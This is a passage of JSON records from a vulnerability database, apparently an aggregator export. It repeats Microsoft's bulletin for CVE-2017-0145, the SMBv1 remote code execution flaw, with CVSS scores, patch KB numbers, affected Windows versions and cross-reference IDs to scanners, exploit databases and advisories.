["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4014077", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4014077", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4014077", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
